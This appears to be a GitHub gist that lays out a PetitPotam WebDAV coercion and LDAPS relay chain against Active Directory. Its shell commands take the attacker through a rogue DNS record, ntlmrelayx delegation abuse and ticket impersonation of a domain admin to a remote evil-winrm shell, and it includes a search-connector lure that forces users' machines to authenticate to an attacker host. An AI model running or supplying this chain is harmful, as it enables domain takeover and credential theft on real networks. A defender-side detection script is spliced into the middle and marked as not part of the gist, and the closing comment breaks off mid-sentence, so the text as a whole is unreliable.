Last active February 28, 2025 09:18
PetitPotam WebDAV coerced authentication + LDAPS relaying
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local

# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da

# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER

# if WebClient is not enabled, you will get the error 0x7. You can try to enable it by viewing a .searchConnector-ms file from the server (if it's a terminal server, for example) or hosting it on a public share and waiting
# Documents.searchConnector-ms example:
# <?xml version="1.0" encoding="UTF-8"?>
# <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
#   <iconReference>imageres.dll,-1002</iconReference>
#   <description>Microsoft Outlook</description>
#   <isSearchOnlyItem>false</isSearchOnlyItem>
#   <includeInStartMenuScope>true</includeInStartMenuScope>
#   <iconReference>\\YOUR_IP@8080\whatever.ico</iconReference>
#   <templateInfo>
#     <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
#   </templateInfo>
#   <simpleLocation>
#     <url>\\YOUR_IP@8080\whatever.ico</url>
#   </simpleLocation>
# </searchConnectorDescription>

# ccache obtained with Rubeus /tgtdeleg and converted with ticketConverter
export KRB5CCNAME=ws.ccache
impacket-getST -k -spn wsman/TARGETSERVER.DOMAIN.local -dc-ip DC_IP -impersonate domain_admin DOMAIN.local/MYWS\$

# after setting up a KDC krb5.conf as per evil-winrm install instructions
export KRB5CCNAME=domain_admin.ccache
evil-winrm -r DOMAIN.local -i TARGETSERVER.DOMAIN.local --spn wsman
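The .searchConnector-ms trick above works because a \\host@port\ UNC in iconReference or simpleLocation/url is only resolvable through WebDAV, so Explorer starts WebClient to fetch it. The following added defender-side example (not part of the gist) scans a directory, for instance a mounted share, for connector files using that UNC form; the sample file it writes is constructed and the 192.0.2.10 host is a placeholder.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

NS = {"sc": "http://schemas.microsoft.com/windows/2009/searchConnector"}
# \\host@8080\share or \\host@SSL@443\share: the @port form is only meaningful
# to the WebDAV Mini-Redirector, so hitting it forces the WebClient service up.
WEBDAV_UNC = re.compile(r"^\\\\[^\\@]+@(?:SSL@)?\d+\\", re.IGNORECASE)

def suspicious_targets(path):
    """Return (element, value) pairs in one connector file that use the WebDAV UNC form."""
    root = ET.parse(path).getroot()
    hits = []
    for tag in ("sc:iconReference", "sc:simpleLocation/sc:url"):
        for el in root.findall(tag, NS):
            text = (el.text or "").strip()
            if WEBDAV_UNC.match(text):
                hits.append((tag.split("/")[-1].split(":")[-1], text))
    return hits

def scan_tree(top):
    """Walk a directory tree and return {file_path: hits} for flagged connectors."""
    findings = {}
    for dirpath, _, files in os.walk(top):
        for name in files:
            if name.lower().endswith(".searchconnector-ms"):
                full = os.path.join(dirpath, name)
                try:
                    hits = suspicious_targets(full)
                except ET.ParseError:
                    continue  # malformed XML is noise here, not a finding
                if hits:
                    findings[full] = hits
    return findings

# Constructed sample mirroring the gist's Documents.searchConnector-ms (host is a placeholder)
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<iconReference>imageres.dll,-1002</iconReference>
<iconReference>\\\\192.0.2.10@8080\\whatever.ico</iconReference>
<simpleLocation><url>\\\\192.0.2.10@8080\\whatever.ico</url></simpleLocation>
</searchConnectorDescription>"""

def demo():
    """Write the constructed sample into a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "Documents.searchConnector-ms"), "w") as f:
            f.write(SAMPLE)
        return scan_tree(d)
```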
If you want to identify accessible locations where the parent folder is most likely to be opened by a real user (the best place to put a .searchConnector-ms file), as well as mass-deploy many search connectors to those locations and mass-clean them up, I made a tool that automates those processes: https://github.com/gjhami/LinkSiren
Additionally, you can also start the WebClient service locally from a 'Manual (Trigger Start)' state, which is the default on Windows Workstations, using the net command on Windows to map and unmap a drive with a WebDAV URL, like the following. This prevents you from having to make a Search Connector: